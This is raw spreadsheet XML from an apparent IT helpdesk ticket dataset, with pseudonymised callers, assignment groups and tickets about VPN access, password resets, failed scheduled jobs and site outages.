    <t>vpn for laptop</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jxgobwrm.qkugdipo@gmail.com
i need a vpn for my new laptop. name llv8517416
knethyen grechduy
engineer, product engineering
company
jxgobwrm.qkugdipo@gmail.com&lt;mailto:jxgobwrm.qkugdipo@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">hr_tool etime option not visitble </t>
  </si>
  <si>
    <t>erp fi  - ob09, two accounts to be added</t>
  </si>
  <si>
    <t>i am sorry, i have another two accounts that need to be added: 21253264 and 21253268. please copy from 21253214.the problem is that the error only comes up if someone tries to clear open items for these accounts. _x000D_
_x000D_
this incident has been created against to ticket_no1536494.</t>
  </si>
  <si>
    <t>tablet needs reimaged due to multiple issues with crm wifi etc</t>
  </si>
  <si>
    <t>emails not coming in from zz mail</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: avglmrts.vhqmtiua@gmail.com_x000D_
_x000D_
good afternoon,_x000D_
i am not receiving the emails that i sent from zz mail._x000D_
please advise_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>telephony_software issue</t>
  </si>
  <si>
    <t>vip2: windows password reset for tifpdchb pedxruyf</t>
  </si>
  <si>
    <t>oybwdsgx oxyhwrfz</t>
  </si>
  <si>
    <t>machine nÃ£o estÃ¡ funcionando</t>
  </si>
  <si>
    <t>i am unable to access the machine utilities to finish the drawers adjustment settings._x000D_
is no network..</t>
  </si>
  <si>
    <t xml:space="preserve">an mehreren pc`s lassen sich verschiedene prgramdntyme nicht Ã¶ffnen. </t>
  </si>
  <si>
    <t>an mehreren pc`s lassen sich verschiedene prgramdntyme nicht Ã¶ffnen. bereich cnc.</t>
  </si>
  <si>
    <t>kqvbrspl jyzoklfx</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wqzarvhx.hfsojckw@gmail.com
help
crm 7611182942 is stuck, pls help to solve, </t>
  </si>
  <si>
    <t>received 6500071831</t>
  </si>
  <si>
    <t>Caller</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of Assignment group</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com
job Job_3181 failed in job_scheduler at: 10/31/2016 05:00:00</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com
 abended job in job_scheduler: SID_32hotf at 08/16/16 09:33:31</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _____circuit     ___x__power (please specify what type of outage)
1. top 23 cert site   ?    ___yes______     (yes/no/na) 
2. when did it start  ?   ________4:31 pm et on 10/30. _____________
3.  scheduled maintenance ( power) ? __yno_____    (yes/no/na)     company power  _________     provider power _________
4.  scheduled maintenance ( network) ? ___no____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    
5. does site have a backup circuit ?  __yes____    (yes/no/na) 
6. backup circuit active ?   ___na_____     (yes/no/na) 
7. site contact notified (phone/email) ?  _________     (yes/no/na) 
8. remote dial-in ?   ____na_______   (yes/no/na) 
9. equipment reset ?    ____na_______    (yes/no/na) 
10. verified site working on backup circuit ?  ___na____     (yes/no/na) 
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ____global_telecom_1#000000223670658 _____________________       
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) 
13.  additional diagnostics</t>
  </si>
  <si>
    <t>Grp_16</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com
job Job_1879 failed in job_scheduler at: 10/28/2016 11:01:00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</si>
</sst>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xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyAlignme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ika" refreshedDate="44365.788190509258" createdVersion="7" refreshedVersion="7" minRefreshableVersion="3" recordCount="8500" xr:uid="{1E0274EE-54B4-4234-9023-6FE2E3AD3ED8}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:D8501" sheet="Sheet1"/>
  </cacheSource>
  <cacheFields count="4">
    <cacheField name="Short description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Description" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="Caller" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Assignment group" numFmtId="0">
      <sharedItems count="74">
        <s v="GRP_0"/>
        <s v="GRP_1"/>
        <s v="GRP_3"/>
        <s v="GRP_4"/>
        <s v="GRP_5"/>
        <s v="GRP_6"/>
        <s v="GRP_7"/>
        <s v="GRP_8"/>
        <s v="GRP_9"/>
        <s v="GRP_10"/>
        <s v="GRP_11"/>
        <s v="GRP_12"/>
        <s v="GRP_13"/>
        <s v="GRP_14"/>
        <s v="GRP_15"/>
        <s v="GRP_16"/>
        <s v="GRP_17"/>
        <s v="GRP_18"/>
        <s v="GRP_19"/>
        <s v="GRP_2"/>
        <s v="GRP_20"/>
        <s v="GRP_21"/>
        <s v="GRP_22"/>
        <s v="GRP_23"/>
        <s v="GRP_24"/>
        <s v="GRP_25"/>
        <s v="GRP_26"/>
        <s v="GRP_27"/>
        <s v="GRP_28"/>
        <s v="GRP_29"/>
        <s v="GRP_30"/>
        <s v="GRP_31"/>
        <s v="GRP_33"/>
        <s v="GRP_34"/>
        <s v="GRP_35"/>
        <s v="GRP_36"/>
        <s v="GRP_37"/>
        <s v="GRP_38"/>
        <s v="GRP_39"/>
        <s v="GRP_40"/>
        <s v="GRP_41"/>
        <s v="GRP_42"/>
        <s v="GRP_43"/>
        <s v="GRP_44"/>
        <s v="GRP_45"/>
        <s v="GRP_46"/>
        <s v="GRP_47"/>
        <s v="GRP_48"/>
        <s v="GRP_49"/>
        <s v="GRP_50"/>
        <s v="GRP_51"/>
        <s v="GRP_52"/>
        <s v="GRP_53"/>
        <s v="GRP_54"/>
        <s v="GRP_55"/>
        <s v="GRP_56"/>
        <s v="GRP_57"/>
        <s v="GRP_58"/>
        <s v="GRP_59"/>
        <s v="GRP_60"/>
        <s v="GRP_61"/>
        <s v="GRP_32"/>
        <s v="GRP_62"/>
        <s v="GRP_63"/>
        <s v="GRP_64"/>
        <s v="GRP_65"/>
        <s v="GRP_66"/>
        <s v="GRP_67"/>
        <s v="GRP_68"/>
        <s v="GRP_69"/>
        <s v="GRP_70"/>
        <s v="GRP_71"/>
        <s v="GRP_72"/>
        <s v="GRP_7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00">
  <r>
    <s v="login issue"/>
    <s v="-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="spxjnwir pjlcoqds"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hmjdrvpb.komuaywn@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_my meetings/skype meetings etc are not appearing in my outlook calendar, can somebody please advise how to correct this?_x000d__x000a__x000d__x000a_kind "/>
    <s v="hmjdrvpb komuaywn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cant log in to vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: eylqgodm.ybqkwiam@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_i cannot log on to vpn_x000d__x000a__x000d__x000a_best "/>
    <s v="eylqgodm ybqkwiam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access hr_tool page"/>
    <s v="unable to access hr_tool page"/>
    <s v="xbkucsvz gcpydteq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype error "/>
    <s v="skype error "/>
    <s v="owlgqjme qhcozdfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to engineering tool and skype"/>
    <s v="unable to log in to engineering tool and skype"/>
    <s v="eflahbxn ltdgrvkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="event: critical:HostName_221.company.com the value of mountpoint threshold for /oracle/SID_37/erpdata21/ "/>
    <s v="event: critical:HostName_221.company.com the value of mountpoint threshold for /oracle/SID_37/erpdata21/sr3psa1d_7/sr3psa1d.data7,perpsr3psa1d,4524 is 98"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="1"/>
  </r>
  <r>
    <s v="ticket_no1550391- employment status - new non-employee [enter user's name]"/>
    <s v="ticket_no1550391- employment status - new non-employee [enter user's name]"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to disable add ins on outlook"/>
    <s v="unable to disable add ins on outlook"/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_874773"/>
    <s v="ticket update on inplant_874773"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool says not connected and unable to submit reports"/>
    <s v="engineering tool says not connected and unable to submit reports"/>
    <s v="badgknqs xwelumfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool site not loading page correctly"/>
    <s v="hr_tool site not loading page correctly"/>
    <s v="dcqsolkx kmsijcuz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to hr_tool to sgxqsuojr xwbesorf cards"/>
    <s v="unable to login to hr_tool to sgxqsuojr xwbesorf cards"/>
    <s v="oblekmrw qltgvspb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wants to reset the password"/>
    <s v="user wants to reset the password"/>
    <s v="iftldbmu fujslwby"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open payslips "/>
    <s v="unable to open payslips "/>
    <s v="epwyvjsz najukwho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_874743"/>
    <s v="ticket update on inplant_874743"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to company vpn"/>
    <s v="_x000a__x000a_received from: xyz@company.com_x000a__x000a_hi,_x000a__x000a_i am unable to login to company vpn website, trying to open a new session using the below link, but not able to get through pls help urgently as we are working from home tomorrow due to month end closing. "/>
    <s v="chobktqj qdamxfuc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when undocking pc , screen will not come back"/>
    <s v="when undocking pc , screen will not come back"/>
    <s v="sigfdwcj reofwzlm"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="nqdyowsm yqerwtna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign into vpn"/>
    <s v="unable to sign into vpn"/>
    <s v="ftsqkvre bqzrupic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to check payslips"/>
    <s v="unable to check payslips"/>
    <s v="mrzgjdal whnldmef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ugephfta.hrbqkvij@gmail.com_x000d__x000a__x000d__x000a_hello helpdesk_x000d__x000a__x000d__x000a_i am not able to connect vpn from home office. couple f hours ago i was connected, now it is not working anymore. getting a message that my session expired but if i click on the link, nothing happens._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d233aa.3f618be0]_x000d__x000a__x000d__x000a_*********************_x000d__x000a__x000d__x000a_need help with your dynamics crm?_x000d__x000a_click here&lt;_x000d__x000a__x000d__x000a_chat with a live agent regarding your dynamics crm questions now! click here&lt;_x000d__x000a__x000d__x000a_best "/>
    <s v="ugephfta hrbqkvij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="pfmcnahv ofzlusri"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user called for vendor phone number"/>
    <s v="user called for vendor phone number"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working"/>
    <s v="_x000a__x000a_received from: dceoufyz.saufqkmd@gmail.com_x000a__x000a_hello,_x000a__x000a_i'm not being able to connect to company network through the vpn. pls check._x000a__x000a_cc: sir-i am not being able to upload as a result of no company network._x000a__x000a_"/>
    <s v="dceoufyz saufqkmd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 password reset "/>
    <s v="erp SID_37 password reset "/>
    <s v="jqhtkfsm xoehtbnl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to hr_tool to check payslips"/>
    <s v="unable to login to hr_tool to check payslips"/>
    <s v="dtisfuyp fpvrjlkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="account locked out"/>
    <s v="lduqxywt wcydjgvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to hr_tool"/>
    <s v="unable to login to hr_tool"/>
    <s v="mwebfhdz csndrxgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to erp SID_34 "/>
    <s v="unable to log in to erp SID_34 "/>
    <s v="hvskpglx bpsfxmon"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for collaboration_platform"/>
    <s v="password reset for collaboration_platform"/>
    <s v="wrlzneit ayqutwgh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset  users"/>
    <s v="hi_x000a__x000a_please reset users password_x000a__x000a_client id: 794_x000a_username : xyz_x000a__x000a_"/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="duplication of network address."/>
    <s v="_x000a__x000a_received from: kxsceyzo.naokumlb@gmail.com_x000a__x000a_gentles,_x000a__x000a_i have two devices that are trying to share an ip address. they are trying to share 96.26.27.9619. one is a printer with the hostname of prtjc0074, and the other is a new display for erp. the display is using dhcp to get its address assigned and the printer is hard coded._x000a__x000a_my guess is that the address 96.26.27.9619 did not get set to a static address in dhcp. i need this corrected so the display will pick up another address._x000a__x000a_"/>
    <s v="kxsceyzo naokumlb"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="fsqwkbez eudsantq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to install flash player"/>
    <s v="unable to install flash player"/>
    <s v="xzbhmfpg bhqxesym"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket_no1564677-employment status - new non-employee "/>
    <s v="ticket_no1564677-employment status - new non-employee _x000d__x000a_"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="ztlvkmyi xldyitwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to resolve ticket_no assigned to self"/>
    <s v="the status button is dierppearing after a few seconds."/>
    <s v="shloyakw jztsxdln"/>
    <x v="0"/>
  </r>
  <r>
    <s v="installing engineering tool"/>
    <s v="need to install engineering tool on the pc"/>
    <s v="qcxivzag vyucbagx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update - inplant_874615"/>
    <s v="ticket update - inplant_874615"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tablet 7350-sound not working"/>
    <s v="tablet 7350-sound not working"/>
    <s v="eqxakzyi cwfrjitq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to system"/>
    <s v="unable to login to system"/>
    <s v="zcaeryfo tdovhslb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please reroute jobs on printer01 to printer02 - issue needs to be resolved today"/>
    <s v="_x000a__x000a_received from: yisohglr.uvteflgb@gmail.com_x000a__x000a_hi -_x000a__x000a_the printer01 printer is not working and needs a part replaced.  can you reroute the jobs in queue to printer printer02?   wihuyjdo qpogfwkb has indicated that prqos001 needs a new part and it may not deliver for a few days so the inwarehouse_tools will need to print on printer02 for now.  this needs to be taken care of today since the inwarehouse_tools are printed and are picked up by an outside vendor at 2:30 pm in usa on a daily basis.   please contact dkmcfreg anwmfvlgenkataramdntyana if you have questions about the jobs in queue for today._x000a__x000a_"/>
    <s v="yisohglr uvteflgb"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to login to hr_tool etime"/>
    <s v="unable to login to hr_tool etime"/>
    <s v="wxdrynag hlktazfm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not log into hr_tool etime through single sign on portal"/>
    <s v="can not log into hr_tool etime through single sign on portal"/>
    <s v="wpdxlbhz etvzjmhx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password changed in password_management_tool but didnt update for erp account"/>
    <s v="password changed in password_management_tool but didnt update for erp account"/>
    <s v="lduqxywt wcydjgvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1424 failed in job_scheduler at: 10/31/2016 09:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1424 failed in job_scheduler at: 10/31/2016 09:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="windows password change via password_management_tool"/>
    <s v="windows password change via password_management_tool"/>
    <s v="boyqfsca yoqrmnep"/>
    <x v="0"/>
  </r>
  <r>
    <s v="status does not change on telephony_software"/>
    <s v="when closing a call, the agent keeps on the &quot;on acd call&quot; status."/>
    <s v="aofnvyzt eqiyskhm"/>
    <x v="6"/>
  </r>
  <r>
    <s v="job mm_zscr0099_dly_merktc3 failed in job_scheduler at: 10/31/2016 08:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_dly_merktc3 failed in job_scheduler at: 10/31/2016 08:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 - i need my password_management_tool password manager password reset."/>
    <s v="i need my password_management_tool password manager password reset._x000d__x000a__x000d__x000a__x000d__x000a_ "/>
    <s v="jwhmqnye xlpvdwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset scm_software password"/>
    <s v="_x000a__x000a_received from: cdbaoqts.wqbsodni@gmail.com_x000a__x000a_hello,_x000a__x000a_please reset my scm_software password._x000a__x000a__x000a_cdbaoqts wqbsodni_x000a_global product manager, markhtyeting initiatives_x000a_cdbaoqts.wqbsodni@gmail.com&lt;mailto:cdbaoqts.wqbsodni@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="cdbaoqts wqbsodni"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out while in office"/>
    <s v="account kept locking out_x000d__x000a_possible reasons_x000d__x000a__x000d__x000a_companysecure or mobile device email setup has an incorrect password stored._x000d__x000a_windows and network passwords do not match."/>
    <s v="kyzhcsrq fwyltvpd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meeting"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dlougnqw.jiuybxew@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i had to reset my password again and i've lost my option for setting up a skype meeting again.  can you please help me?  i can't recall how you were able to bring it back the last time._x000d__x000a__x000d__x000a_"/>
    <s v="dlougnqw jiuybxew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="enquiry on impact rewards"/>
    <s v="enquiry on impact rewards- how to get password reset"/>
    <s v="kpudhygb vnizrdeb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need dn for material 3346599/ plant plant_197/ 5019253000     1 pcs  thanks"/>
    <s v="need dn for material 3346599/ plant plant_197/ 5019253000     1 pcs  "/>
    <s v="wckrxovs aunsgzmd"/>
    <x v="5"/>
  </r>
  <r>
    <s v="unlock logon password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cnhkypxw.lafncksi@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_please help to unlock my company net log on password. urgent._x000d__x000a_"/>
    <s v="cnhkypxw lafncksi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job mm_zscr0099_dly_merktc2 failed in job_scheduler at: 10/31/2016 05:19:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_dly_merktc2 failed in job_scheduler at: 10/31/2016 05:19:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3181 failed in job_scheduler at: 10/31/2016 05:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3181 failed in job_scheduler at: 10/31/2016 05:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password changed required for user- abc"/>
    <s v="password changed required for user- abc"/>
    <s v="qslrdpwk mdkivacj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lkfzibrx.ljnabpgx@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d23357.fcbe58b0]_x000d__x000a__x000d__x000a_best "/>
    <s v="lkfzibrx ljnabpgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" urgent - create dlv"/>
    <s v="please help , i try to create dlv for this mm's_x000d__x000a_7393673 sto 5019411580/00001_x000d__x000a_7393617 sto 5019329184/00002_x000d__x000a__x000d__x000a_sto from plant_289 to plant_101 "/>
    <s v="qfnthlam lxvnwuja"/>
    <x v="5"/>
  </r>
  <r>
    <s v="apac company : two switches are down since 3.45 am et on 10/31."/>
    <s v="apac company : two switches are down since 3.45 am et on 10/31._x000d__x000a__x000d__x000a_company-ap-chn-apac-company-2960-access-sw04 _x000d__x000a_company-ap-chn-apac-company-2960-access-sw03."/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="7"/>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quxtnlgd tqnjyzsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery note can't do post goods issue"/>
    <s v="d/n #9169754657&amp;8058643570_x000d__x000a_plant:plant_304 to plant_310_x000d__x000a_the issue display:_x000d__x000a_ekpo-sobkz=e; ekpo-umsok=_; ekpo-kzbws&lt;&gt;_ ekpo-kzvbr&lt;&gt;e (note 305582) not supported (check your entry)_x000d__x000a_"/>
    <s v="lyzqrctk cfotnzrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 10/31/2016 02:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 10/31/2016 02:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/31/2016 01:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/31/2016 01:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_2588 failed in job_scheduler at: 10/31/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2588 failed in job_scheduler at: 10/31/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_2599 failed in job_scheduler at: 10/31/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2599 failed in job_scheduler at: 10/31/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="user locked- user :xyz"/>
    <s v="_x000a__x000a_received from: przndfbo.pldqbhtn@gmail.com_x000a__x000a_it team,_x000a__x000a_please kindly  release locked computer for user : xyz_x000a_user name : fbmugzrl ahyiuqev_x000a__x000a_"/>
    <s v="przndfbo pldqbhtn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 7350: my laptop speakers is not working again and requires your urgent help."/>
    <s v="my laptop speakers is not working again and requires your urgent help."/>
    <s v="jgautdmk fpurxzew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs help to connect to the wireless connection at home."/>
    <s v="user needs help to connect to the wireless connection at home._x000a_-had the user connect to the lan at home._x000a_-connected to the user system using teamviewer._x000a_-checked the network settings._x000a_-help the user login to the home wireless._x000a_-disconnected the home lan._x000a_-user confirmed that he is able to login to the home wireless._x000a_-issue resolved."/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1564062: ticket update "/>
    <s v="inc1564062: ticket update "/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 10/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 10/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 10/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 10/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 10/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 10/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="power outage:UK al, 1st and 5th ave sites hard down since at 4:31 pm et on 10/30. "/>
    <s v="what type of outage:  _____network     _____circuit     ___x__power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________4:31 pm et on 10/30. ______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __yno_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_na_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global_telecom_1#000000223670658 _____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="power outage : germany, mx: site is hard down since 10/30/2016 10:09 am et"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______10/30/2016 10:09 am et_______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____no___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ____no__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____no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x v="7"/>
  </r>
  <r>
    <s v="job Job_1424 failed in job_scheduler at: 10/30/2016 10:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1424 failed in job_scheduler at: 10/30/2016 10:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="ilvortuq zfgrlewm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user yhmwxsqj ugnthxky having issues logging to outlook. "/>
    <s v="user yhmwxsqj ugnthxky having issues logging to outlook. _x000a__x000a_rgtry will be available tomorrow around 9.00 am, he works out of company campus. request you to reach out to him &amp; fix the issue."/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 10/30/2016 02:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 10/30/2016 02:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="engineering tool drawing originals in pdf format are not shown"/>
    <s v="hello it service,_x000d__x000a_i need to monitor the manufacturing drawings to approve manufacturing._x000d__x000a_the engineering tool stopped showing pdf originals:_x000d__x000a__x000d__x000a_process: _x000d__x000a__x000d__x000a__x000d__x000a_[[erp] /production_order_interface_vendor/bas_cr 167 - rfc destination production_order_interface_vendor-views-010 not accessible (file cannot be stamped now; ).]_x000d__x000a_  08:06:34  _x000d__x000a_    bapireturnederrorexception_x000d__x000a_    [stack trace]_x000d__x000a_    cadagent.erp.conn.jco.tm.jcoerpmanager.handlereturnstructureorreturntableline(jcoerpmanager.java:379, @(#) $id: jcoerpmanager.java 60470 2015-07-24 09:02:22z wt $)_x000d__x000a_    cadagent.erp.conn.jco.tm.jcoerpmanager.handlereturnstructure(jcoerpmanager.java:360, @(#) $id: jcoerpmanager.java 60470 2015-07-24 09:02:22z wt $)_x000d__x000a_    cadagent.erp.conn.jco.tm.jcoerpmanager.generirtcfunction(jcoerpmanager.java:324, @(#) $id: jcoerpmanager.java 60470 2015-07-24 09:02:22z wt $)_x000d__x000a_    cadagent.objmod.plmfile.checkoutview(plmfile.java:1109, @(#) $id: plmfile.java 182 2016-02-18 19:00:08z aju $)_x000d__x000a_    